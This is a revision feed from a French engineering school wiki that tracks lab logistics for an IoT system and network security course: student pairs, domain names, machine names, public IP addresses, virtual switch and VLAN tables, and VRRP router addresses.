&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 ||&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 ||&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 ||&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11413</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11413"/>
		<updated>2026-01-26T10:33:53Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Tableau des commutateurs virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|Mohamed Salhi&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 ||&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 ||&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 ||&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11412</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11412"/>
		<updated>2026-01-26T10:33:27Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Tableau des commutateurs virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|Mohamed Salhi&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 ||&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 ||&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 ||&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11260</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11260"/>
		<updated>2026-01-20T14:27:09Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || || SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || || SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || || SE4.Elvis||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || || SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| || Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| || Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| || || Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| || Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| || || Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| || || Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| || Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.166&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
